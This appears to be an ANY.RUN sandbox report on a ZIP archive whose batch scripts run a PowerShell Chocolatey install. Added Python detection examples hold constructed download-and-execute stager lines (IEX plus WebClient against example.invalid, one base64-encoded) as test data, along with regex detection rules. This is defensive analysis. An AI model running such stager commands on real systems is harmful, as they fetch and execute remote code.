File name: Новая сжатая ZIP-папка.zip (the Russian Windows Explorer default name for a newly created archive, "New compressed ZIP folder")

Full analysis: https://app.any.run/tasks/89bf32af-7242-4a9f-ae89-59107c17c8d3
Verdict: Malicious activity
Analysis date: November 08, 2024, 21:40:14
OS: Windows 10 Professional (build: 19045, 64 bit)
Tags:
arch-doc
arch-exec
arch-scr
Indicators:
MIME: application/zip
File info: Zip archive data, at least v2.0 to extract, compression method=deflate
MD5: 4E3C574EF3DE68021062D5F22564A859
SHA1: 80C7D4A351EDC915FF585FA10860ABF2CA6CBEC0
SHA256: DC334DF203CF3CC22AD64C2A389039029B20A8825AC8EFC537984D8EB6C24D86
SSDEEP: 24:9AjhiYV4ysYT9u6GFNVBgLHgzABrQli/uoSM3NHJVhEupaRyakjhm:9ShXsdBwLHgEBrQJoT3BJVhEiICm

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS
    • Bypass execution policy to execute commands: powershell.exe (PID: 5852), powershell.exe (PID: 6100)
    • Changes powershell execution policy (Bypass): cmd.exe (PID: 6316), cmd.exe (PID: 3156)
  • SUSPICIOUS
    • Generic archive extractor: WinRAR.exe (PID: 6436)
    • Probably download files using WebClient: cmd.exe (PID: 6316), cmd.exe (PID: 3156)
    • Starts CMD.EXE for commands execution: cmd.exe (PID: 6384), cmd.exe (PID: 1500), cmd.exe (PID: 1028)
    • Application launched itself: cmd.exe (PID: 6384), cmd.exe (PID: 1500), cmd.exe (PID: 1028)
    • Starts POWERSHELL.EXE for commands execution: cmd.exe (PID: 6316), cmd.exe (PID: 3156)
    • The process bypasses the loading of PowerShell profile settings: cmd.exe (PID: 6316), cmd.exe (PID: 3156)
    • Executable content was dropped or overwritten: powershell.exe (PID: 5852)
    • The process executes Powershell scripts: cmd.exe (PID: 6316), cmd.exe (PID: 3156)
    • Possibly malicious use of IEX has been detected: cmd.exe (PID: 6316), cmd.exe (PID: 3156)
    • Drops 7-zip archiver for unpacking: powershell.exe (PID: 5852)
  • INFO
    • Manual execution by a user: notepad.exe (PID: 1452), cmd.exe (PID: 6384), notepad.exe (PID: 1576), cmd.exe (PID: 1028), cmd.exe (PID: 1500), notepad.exe (PID: 1184)
    • The process uses the downloaded file: WinRAR.exe (PID: 6436)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
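Every MALICIOUS and SUSPICIOUS signature above keys on one chain: cmd.exe launches powershell.exe with the execution policy bypassed on the command line, the profile skipped, and a WebClient download fed to IEX. The Python below is an added example written for this page, not ANY.RUN's signature logic and not the sample's own script. It runs equivalent rules over constructed Sysmon-style process-creation events (the PIDs, paths and the example.invalid host are made up), accepts the abbreviated switches powershell.exe itself accepts (-ep, -exec, -nop, -enc), and also decodes an -EncodedCommand payload before matching, which goes beyond what this sample does. The caveat a practitioner needs: this exact one-liner shape is what popular installer bootstraps use, so these hits alone do not make a process malicious. In this run every dropped file is a Chocolatey package component and the only IDS alerts are ET INFO rules on chocolatey.org, so parent/child context, the download host and the dropped files decide, not the command-line text by itself.

```python
import base64
import re
from typing import Optional

# --- Constructed input --------------------------------------------------------
# Sysmon-style process-creation events (EventID 1 fields, trimmed). Made up for
# the example; the PIDs and the example.invalid host are not from the report.

def encode_command(script: str) -> str:
    """Base64(UTF-16LE), the form powershell.exe -EncodedCommand accepts."""
    return base64.b64encode(script.encode("utf-16le")).decode("ascii")

PS_PATH = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"

SAMPLE_EVENTS = [
    {   # cmd.exe -> powershell.exe: policy bypass, no profile, WebClient piped to IEX
        "pid": 1001, "parent_image": r"C:\Windows\System32\cmd.exe", "image": PS_PATH,
        "command_line": ("powershell -NoProfile -ExecutionPolicy Bypass -Command "
                         "\"iex ((New-Object System.Net.WebClient).DownloadString("
                         "'https://example.invalid/install.ps1'))\""),
    },
    {   # same stager with abbreviated switches and the body hidden in -enc
        "pid": 1002, "parent_image": r"C:\Windows\System32\cmd.exe", "image": PS_PATH,
        "command_line": "powershell.exe -nop -w hidden -ep bypass -enc " + encode_command(
            "IEX (New-Object Net.WebClient).DownloadString('https://example.invalid/a.ps1')"),
    },
    {   # benign maintenance script: -NoProfile alone is only a weak signal
        "pid": 1003, "parent_image": r"C:\Windows\System32\svchost.exe", "image": PS_PATH,
        "command_line": r"powershell.exe -NoProfile -File C:\scripts\backup.ps1",
    },
]

# --- Rules --------------------------------------------------------------------
# -e / -ec / -enc / -EncodedCommand followed by a base64 blob.
ENC_RE = re.compile(r"-e(?:c|nc\w*)?\s+([A-Za-z0-9+/=]{16,})", re.I)

# (signature name as the report phrases it, ATT&CK technique, regex on the text)
RULES = [
    ("Bypass execution policy", "T1059.001",
     re.compile(r"-(?:ep|ex\w*)\s+(?:bypass|unrestricted)\b", re.I)),
    ("Skips PowerShell profile", "T1059.001", re.compile(r"-nop\w*\b", re.I)),
    ("Invoke-Expression (IEX)", "T1059.001",
     re.compile(r"\b(?:iex|invoke-expression)\b", re.I)),
    ("Download via WebClient", "T1105",
     re.compile(r"net\.webclient|downloadstring|downloadfile|invoke-webrequest|\biwr\b", re.I)),
    ("Encoded command", "T1027", ENC_RE),
]


def decode_encoded_command(command_line: str) -> Optional[str]:
    """Plaintext of an -EncodedCommand payload, or None if absent or not valid."""
    m = ENC_RE.search(command_line)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16le")
    except (ValueError, UnicodeDecodeError):
        return None


def _basename(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()


def triage(event: dict) -> list:
    """All (signature, technique) pairs that fire for one event. The encoded
    payload, if any, is decoded and scanned as well, so hiding the WebClient/IEX
    stager inside base64 does not dodge the text rules."""
    text = event["command_line"]
    decoded = decode_encoded_command(text)
    if decoded:
        text = f"{text} {decoded}"
    hits = [(name, tid) for name, tid, rx in RULES if rx.search(text)]
    # Parent/child context, independent of the command-line text.
    if _basename(event["parent_image"]) == "cmd.exe" and _basename(event["image"]) == "powershell.exe":
        hits.append(("Starts POWERSHELL.EXE for commands execution", "T1059.003"))
    return hits


def triage_all(events) -> dict:
    """pid -> list of signature names, in rule order."""
    return {e["pid"]: [name for name, _ in triage(e)] for e in events}


if __name__ == "__main__":
    for pid, names in triage_all(SAMPLE_EVENTS).items():
        print(pid, names)
```

The rules deliberately match switch prefixes rather than full switch names because powershell.exe resolves any unambiguous prefix; a detection that only looks for the literal string "-ExecutionPolicy Bypass" misses "-ep bypass". The parent/child rule is kept separate from the text rules so that an empty or encoded command line still yields the cmd.exe → powershell.exe observation the report records.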
No Malware configuration.

TRiD

.zip | ZIP compressed archive (100)

EXIF

ZIP

ZipRequiredVersion: 20
ZipBitFlag: -
ZipCompression: Deflated
ZipModifyDate: 2024:11:09 00:04:14
ZipCRC: 0xbbadf48f
ZipCompressedSize: 609
ZipUncompressedSize: 1157
ZipFileName: ????⮢?? ???㬥?? (3).txt
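ZipBitFlag "-" means the archive was written with no general-purpose flags, in particular without bit 11 (the UTF-8 file-name flag), so the member name is stored in the producing machine's OEM code page and a parser that assumes cp437 prints the "????" seen above. The archive's own name is the Russian Explorer default, so cp866 is the likely page; that is an assumption, and the sample's real member name cannot be recovered from this report. The Python below is an added example, not the sample's contents: it writes a one-member ZIP by hand with a constructed Cyrillic name encoded in cp866 (the compression method does not matter for this, so the member is stored rather than deflated), shows that Python's zipfile mangles the name the same way, walks the central directory honouring bit 11, and recovers the name from a cp437-mangled string by re-encoding it.

```python
import io
import struct
import zipfile
import zlib

UTF8_NAME_FLAG = 0x0800  # general-purpose bit 11: file names are UTF-8

# Constructed sample member: a Cyrillic name as a Russian-locale Explorer would
# store it, in the OEM code page cp866 with bit 11 clear. It is NOT the member
# of the analysed archive, whose real name cannot be recovered from the report.
SAMPLE_NAME = "Новый документ.txt"
SAMPLE_DATA = b"@echo off\r\n"


def build_zip(name: str, data: bytes, codepage: str = "cp866", utf8_flag: bool = False) -> bytes:
    """Write a one-member, stored (method 0) ZIP by hand. zipfile cannot emit a
    non-ASCII name without setting bit 11, so the headers are packed directly."""
    raw = name.encode("utf-8" if utf8_flag else codepage)
    flags = UTF8_NAME_FLAG if utf8_flag else 0
    crc = zlib.crc32(data) & 0xFFFFFFFF
    dos_date = 0x21  # 1980-01-01; the DOS date/time fields are not the point here
    local = struct.pack("<IHHHHHIIIHH", 0x04034B50, 20, flags, 0, 0, dos_date,
                        crc, len(data), len(data), len(raw), 0) + raw + data
    central = struct.pack("<IHHHHHHIIIHHHHHII", 0x02014B50, 20, 20, flags, 0, 0, dos_date,
                          crc, len(data), len(data), len(raw), 0, 0, 0, 0, 0, 0) + raw
    eocd = struct.pack("<IHHHHIIH", 0x06054B50, 0, 0, 1, 1, len(central), len(local), 0)
    return local + central + eocd


def list_members(blob: bytes, oem_codepage: str = "cp866") -> list:
    """Walk the central directory and decode each name as its producer meant:
    UTF-8 when bit 11 is set, otherwise the producing system's OEM code page.
    Returns (name, utf8_flag_set, raw_name_bytes) per member."""
    eocd_off = blob.rfind(b"PK\x05\x06")
    if eocd_off < 0:
        raise ValueError("no end-of-central-directory record")
    _, _, _, _, total, _, cd_off, _ = struct.unpack_from("<IHHHHIIH", blob, eocd_off)
    members, pos = [], cd_off
    for _ in range(total):
        f = struct.unpack_from("<IHHHHHHIIIHHHHHII", blob, pos)
        if f[0] != 0x02014B50:
            raise ValueError("bad central directory header")
        flags, name_len, extra_len, comment_len = f[3], f[10], f[11], f[12]
        raw = blob[pos + 46:pos + 46 + name_len]
        utf8 = bool(flags & UTF8_NAME_FLAG)
        members.append((raw.decode("utf-8" if utf8 else oem_codepage, errors="replace"), utf8, raw))
        pos += 46 + name_len + extra_len + comment_len
    return members


def stdlib_name(blob: bytes) -> str:
    """What Python's zipfile reports: names without bit 11 are decoded as cp437,
    which turns cp866 Cyrillic into accented Latin, Greek and box-drawing glyphs."""
    return zipfile.ZipFile(io.BytesIO(blob)).namelist()[0]


def recover_cp437_name(mangled: str, oem_codepage: str = "cp866") -> str:
    """cp437 assigns a character to every byte value, so re-encoding the mangled
    string with cp437 gives back the original bytes, which are then decoded
    with the right OEM code page."""
    return mangled.encode("cp437").decode(oem_codepage)


if __name__ == "__main__":
    blob = build_zip(SAMPLE_NAME, SAMPLE_DATA)
    print("zipfile/cp437  :", stdlib_name(blob))
    print("cp866 recovered:", recover_cp437_name(stdlib_name(blob)))
    for name, utf8, raw in list_members(blob):
        print("central dir    :", name, "| utf8 flag:", utf8, "| bytes:", raw.hex())
```

When the guess at the OEM page is wrong the recovered string will still be garbage, just different garbage; checking that the result contains a plausible extension and no replacement characters is the sanity test, and Python 3.11+ lets you pass the page directly as `zipfile.ZipFile(..., metadata_encoding="cp866")` instead of the cp437 round trip.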
All screenshots are available in the full report
Total processes: 160
Monitored processes: 25
Malicious processes: 0
Suspicious processes: 5

Behavior graph (monitored processes in launch order; "no specs" = no signature fired for that process):

start, winrar.exe (no specs), notepad.exe (no specs), sppextcomobj.exe (no specs), slui.exe, cmd.exe (no specs), conhost.exe (no specs), cmd.exe (no specs), conhost.exe (no specs), notepad.exe (no specs), powershell.exe, setx.exe (no specs), setx.exe (no specs), powershell.exe (no specs), slui.exe, cmd.exe (no specs), conhost.exe (no specs), cmd.exe (no specs), conhost.exe (no specs), cmd.exe, conhost.exe (no specs), cmd.exe (no specs), conhost.exe (no specs), powershell.exe, notepad.exe (no specs), powershell.exe (no specs)

Process information (per process: PID, command line, image path, parent process, then the details and loaded modules as recorded)

PID: 1028
CMD: "C:\WINDOWS\System32\cmd.exe" /C "C:\Users\admin\Desktop\1.cmd"
Path: C:\Windows\System32\cmd.exe
Parent process: explorer.exe
User: admin
Company: Microsoft Corporation
Integrity Level: HIGH (elevated run of 1.cmd; the same script is also run at MEDIUM as PID 1500)
Description: Windows Command Processor
Exit code: 0
Version: 10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\cmd.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\cmdext.dll
c:\windows\system32\advapi32.dll
PID: 1184
CMD: "C:\WINDOWS\system32\NOTEPAD.EXE" C:\Users\admin\Desktop\2.txt
Path: C:\Windows\System32\notepad.exe
Parent process: explorer.exe
User: admin
Company: Microsoft Corporation
Integrity Level: MEDIUM
Description: Notepad
Version: 10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\notepad.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\win32u.dll
c:\windows\system32\gdi32full.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\user32.dll
PID: 1452
CMD: "C:\WINDOWS\System32\NOTEPAD.EXE" C:\Users\admin\Desktop\1.bat
Path: C:\Windows\System32\notepad.exe
Parent process: explorer.exe
User: admin
Company: Microsoft Corporation
Integrity Level: MEDIUM
Description: Notepad
Exit code: 0
Version: 10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\notepad.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\win32u.dll
c:\windows\system32\gdi32full.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\user32.dll
PID: 1500
CMD: C:\WINDOWS\system32\cmd.exe /c ""C:\Users\admin\Desktop\1.cmd" "
Path: C:\Windows\System32\cmd.exe
Parent process: explorer.exe
User: admin
Company: Microsoft Corporation
Integrity Level: MEDIUM
Description: Windows Command Processor
Exit code: 0
Version: 10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\cmd.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\cmdext.dll
c:\windows\system32\advapi32.dll
PID: 1576
CMD: "C:\WINDOWS\system32\NOTEPAD.EXE" C:\Users\admin\Desktop\2.txt
Path: C:\Windows\System32\notepad.exe
Parent process: explorer.exe
User: admin
Company: Microsoft Corporation
Integrity Level: MEDIUM
Description: Notepad
Version: 10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\notepad.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\win32u.dll
c:\windows\system32\gdi32full.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\user32.dll
PID: 2784
CMD: powershell
Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Parent process: cmd.exe
User: admin
Company: Microsoft Corporation
Integrity Level: HIGH (interactive PowerShell started from an elevated cmd.exe)
Description: Windows PowerShell
Exit code: 3221225786 (0xC000013A, STATUS_CONTROL_C_EXIT: the console was closed or interrupted rather than the process finishing on its own)
Version: 10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\atl.dll
PID: 2808
CMD: C:\WINDOWS\System32\slui.exe -Embedding
Path: C:\Windows\System32\slui.exe
Parent process: svchost.exe (COM activation of the Windows Activation Client; OS background activity unrelated to the sample)
User: admin
Company: Microsoft Corporation
Integrity Level: MEDIUM
Description: Windows Activation Client
Exit code: 0
Version: 10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\slui.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\bcrypt.dll
c:\windows\system32\user32.dll
PID: 3004
CMD: "C:\WINDOWS\System32\SLUI.exe" RuleId=3482d82e-ca2c-4e1f-8864-da0267b484b2;Action=AutoActivate;AppId=55c92734-d682-4d71-983e-d6ec3f16059f;SkuId=4de7cb65-cdf1-4de9-8ae8-e3cce27b9f2c;NotificationInterval=1440;Trigger=TimerEvent
Path: C:\Windows\System32\slui.exe
Parent process: SppExtComObj.Exe (timer-driven activation attempt by the Software Protection Platform; OS background activity unrelated to the sample)
User: NETWORK SERVICE
Company: Microsoft Corporation
Integrity Level: SYSTEM
Description: Windows Activation Client
Exit code: 1
Version: 10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\slui.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\bcrypt.dll
c:\windows\system32\user32.dll
PID: 3076
CMD: \??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1
Path: C:\Windows\System32\conhost.exe
Parent process: cmd.exe
User: admin
Company: Microsoft Corporation
Integrity Level: MEDIUM
Description: Console Window Host
Exit code: 0
Version: 10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\conhost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\shcore.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
PID: 3156
CMD: cmd.exe
Path: C:\Windows\System32\cmd.exe
Parent process: cmd.exe
User: admin
Company: Microsoft Corporation
Integrity Level: HIGH
Description: Windows Command Processor
Exit code: 3221225786 (0xC000013A, STATUS_CONTROL_C_EXIT: console closed or interrupted)
Version: 10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\cmd.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\winbrand.dll
c:\windows\system32\wldp.dll
Total events: 27 532
Read events: 27 512
Write events: 19
Delete events: 1

Modification events (all by WinRAR.exe, PID 6436, operation: write; these are WinRAR's own UI-state writes, the recent-archive list and column widths, not persistence)

HKEY_CURRENT_USER\SOFTWARE\WinRAR\ArcHistory, value 1 = C:\Users\admin\Desktop\GoogleChromeEnterpriseBundle64.zip
HKEY_CURRENT_USER\SOFTWARE\WinRAR\ArcHistory, value 0 = C:\Users\admin\AppData\Local\Temp\Новая сжатая ZIP-папка.zip
HKEY_CURRENT_USER\SOFTWARE\WinRAR\FileList\FileColumnWidths, name = 120
HKEY_CURRENT_USER\SOFTWARE\WinRAR\FileList\FileColumnWidths, size = 80
HKEY_CURRENT_USER\SOFTWARE\WinRAR\FileList\FileColumnWidths, type = 120
HKEY_CURRENT_USER\SOFTWARE\WinRAR\FileList\FileColumnWidths, mtime = 100
HKEY_CURRENT_USER\SOFTWARE\WinRAR\Interface\MainWin, Placement = 2C0000000000000001000000FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF3D0000002D000000FD03000016020000
HKEY_CURRENT_USER\SOFTWARE\WinRAR\FileList\ArcColumnWidths, name = 256
HKEY_CURRENT_USER\SOFTWARE\WinRAR\FileList\ArcColumnWidths, size = 80
HKEY_CURRENT_USER\SOFTWARE\WinRAR\FileList\ArcColumnWidths, psize = 80
Executable files: 7
Suspicious files: 3
Text files: 77
Unknown types: 0

Dropped files

The two __PSScriptPolicyTest_* files (identical hashes) are stubs PowerShell itself writes at start-up to probe whether an AppLocker/WDAC script policy is enforced. Everything else written by PID 5852 is the expanded Chocolatey package layout (chocolatey.nuspec, _rels\.rels, tools\chocolateyInstall.ps1, tools\chocolateysetup.psm1, tools\VERIFICATION.txt, choco.exe.manifest) under %TEMP%\chocolatey\chocoInstall.

PID   Process         Type        Filename
5852  powershell.exe  compressed  C:\Users\admin\AppData\Local\Temp\chocolatey\chocoInstall\chocolatey.zip
      MD5: 95231E41829F1C3A5AE890B71BCEF1FA
      SHA256: C73D4EDA9AB5CA89583EF90838C4B819A304C9AC5A8AD5A89DCB7EDB15AB5FCF
5852  powershell.exe  text        C:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_53ye1hlw.w4l.ps1
      MD5: D17FE0A3F47BE24A6453E9EF58C94641
      SHA256: 96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
5852  powershell.exe  xml         C:\Users\admin\AppData\Local\Temp\chocolatey\chocoInstall\chocolatey.nuspec
      MD5: 6F1D1A607FCF498C306BA60F4C49E0BB
      SHA256: A2B9463494ED831C3A388C1867043FDA6D7B308125F1CE33E52C914DE5D35B99
6436  WinRAR.exe      text        C:\Users\admin\AppData\Local\Temp\Rar$DRa6436.33674\2.txt
      MD5: AFE5B37A2AA5EE699527A11C3C0F52CF
      SHA256: B8265B3236DFAF023570313B8238C42C44A6FDE488AEF539932C86CB82CBF63A
5852  powershell.exe  xml         C:\Users\admin\AppData\Local\Temp\chocolatey\chocoInstall\_rels\.rels
      MD5: BB9B566B51B59EF054CBC0D22DF193C4
      SHA256: DDDB65206BB1DE00C7EC48740C10C2ABC0B440F22C49FB1FD74AFEDA0D095528
5852  powershell.exe  text        C:\Users\admin\AppData\Local\Temp\chocolatey\chocoInstall\tools\VERIFICATION.txt
      MD5: F5BA42804D762840BBDA4CB2AE6824E7
      SHA256: 75595E484E5BC5283398D878E882A234E4F0C1556FA5D41E8770336881E1C4FE
5852  powershell.exe  text        C:\Users\admin\AppData\Local\Temp\chocolatey\chocoInstall\tools\chocolateysetup.psm1
      MD5: 77102E5869DBEED024C2C95A697DC94B
      SHA256: D8E4B60FE7C256BE2D50DBBAF9F4837C738E1844CD17198614CA7CF26176717A
5852  powershell.exe  text        C:\Users\admin\AppData\Local\Temp\chocolatey\chocoInstall\tools\chocolateyInstall.ps1
      MD5: DB89FC7120818885D1A1E112AC7BE6C1
      SHA256: C46903CFED1D74620630D0653CE057B3079AF5789AFEB1A5F884298A8693B4EC
5852  powershell.exe  text        C:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_pqqyxn4d.1wx.psm1
      MD5: D17FE0A3F47BE24A6453E9EF58C94641
      SHA256: 96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
5852  powershell.exe  xml         C:\Users\admin\AppData\Local\Temp\chocolatey\chocoInstall\tools\chocolateyInstall\choco.exe.manifest
      MD5: 1B3ED984F60915F976B02BE949E212CB
      SHA256: D715D6071E5CDD6447D46ED8E903B9B3AD5952ACC7394EE17593D87A546C17FC
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests: 7
TCP/UDP connections: 55
DNS requests: 25
Threats: 2

HTTP requests

All seven plaintext HTTP requests are certificate-revocation (OCSP/CRL) lookups by Windows components; none comes from the cmd.exe/powershell.exe chain, whose outbound traffic was TLS and shows up only in the Threats section (chocolatey.org in the SNI). The Type and Size columns were empty in the report and are omitted.

PID   Process                 Method  Code  IP                  CN       Reputation   URL
1552  svchost.exe             GET     200   192.229.221.95:80   unknown  whitelisted  http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBSAUQYBMq2awn1Rh6Doh%2FsBYgFV7gQUA95QNVbRTLtm8KPiGxvDl7I90VUCEAJ0LqoXyo4hxxe7H%2Fz9DKA%3D
4360  SearchApp.exe           GET     200   192.229.221.95:80   unknown  whitelisted  http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBTrjrydRyt%2BApF3GSPypfHBxR5XtQQUs9tIpPmhxdiuNkHMEWNpYim8S8YCEAI5PUjXAkJafLQcAAsO18o%3D
6944  svchost.exe             GET     200   23.52.120.96:80     unknown  whitelisted  http://www.microsoft.com/pkiops/crl/MicSecSerCA2011_2011-10-18.crl
3772  SIHClient.exe           GET     200   23.52.120.96:80     unknown  whitelisted  http://www.microsoft.com/pkiops/crl/Microsoft%20ECC%20Product%20Root%20Certificate%20Authority%202018.crl
3772  SIHClient.exe           GET     200   23.52.120.96:80     unknown  whitelisted  http://www.microsoft.com/pkiops/crl/Microsoft%20ECC%20Update%20Secure%20Server%20CA%202.1.crl
6516  backgroundTaskHost.exe  GET     200   192.229.221.95:80   unknown  whitelisted  http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBQ50otx%2Fh0Ztl%2Bz8SiPI7wEWVxDlQQUTiJUIBiV5uNu5g%2F6%2BrkS7QYXjzkCEAn5bsKVVV8kdJ6vHl3O1J0%3D
6944  svchost.exe             GET     200   23.48.23.177:80     unknown  whitelisted  http://crl.microsoft.com/pki/crl/products/MicRooCerAut2011_2011_03_22.crl

Connections (only the first ten of the 55 connections are listed in the summary; the Domain, ASN and CN columns are empty where the report left them empty)

PID   Process              IP:port              Domain                           ASN                         CN  Reputation
4     System               192.168.100.255:137                                                                   whitelisted
6944  svchost.exe          4.231.128.59:443     settings-win.data.microsoft.com  MICROSOFT-CORP-MSN-AS-BLOCK  IE  whitelisted
1248  RUXIMICS.exe         4.231.128.59:443     settings-win.data.microsoft.com  MICROSOFT-CORP-MSN-AS-BLOCK  IE  whitelisted
5488  MoUsoCoreWorker.exe  4.231.128.59:443     settings-win.data.microsoft.com  MICROSOFT-CORP-MSN-AS-BLOCK  IE  whitelisted
4360  SearchApp.exe        92.123.104.32:443    www.bing.com                     Akamai International B.V.    DE  whitelisted
4360  SearchApp.exe        192.229.221.95:80    ocsp.digicert.com                EDGECAST                     US  whitelisted
4     System               192.168.100.255:138                                                                   whitelisted
1552  svchost.exe          20.190.160.22:443    login.live.com                   MICROSOFT-CORP-MSN-AS-BLOCK  NL  whitelisted
1552  svchost.exe          192.229.221.95:80    ocsp.digicert.com                EDGECAST                     US  whitelisted
4360  SearchApp.exe        92.123.104.63:443    th.bing.com                      Akamai International B.V.    DE  whitelisted

DNS requests

Domain
IP
Reputation
settings-win.data.microsoft.com
  • 4.231.128.59
  • 51.124.78.146
  • 20.73.194.208
whitelisted
www.bing.com
  • 92.123.104.32
  • 92.123.104.38
  • 92.123.104.34
whitelisted
ocsp.digicert.com
  • 192.229.221.95
whitelisted
google.com
  • 142.250.186.46
whitelisted
login.live.com
  • 20.190.160.22
  • 40.126.32.138
  • 40.126.32.133
  • 40.126.32.76
  • 40.126.32.136
  • 20.190.160.17
  • 40.126.32.140
  • 40.126.32.68
whitelisted
th.bing.com
  • 92.123.104.63
  • 92.123.104.38
  • 92.123.104.62
  • 92.123.104.33
  • 92.123.104.28
  • 92.123.104.34
  • 92.123.104.32
whitelisted
go.microsoft.com
  • 23.213.166.81
whitelisted
crl.microsoft.com
  • 23.48.23.177
  • 23.48.23.164
  • 23.48.23.156
  • 23.48.23.143
whitelisted
www.microsoft.com
  • 23.52.120.96
whitelisted
slscr.update.microsoft.com
  • 20.12.23.50
whitelisted

Threats

PID   Process         Class                    Message
5852  powershell.exe  Potentially Bad Traffic  ET INFO Observed Chocolatey Windows Package Management Domain (chocolatey .org in TLS SNI)
6100  powershell.exe  Potentially Bad Traffic  ET INFO Observed Chocolatey Windows Package Management Domain (chocolatey .org in TLS SNI)
No debug info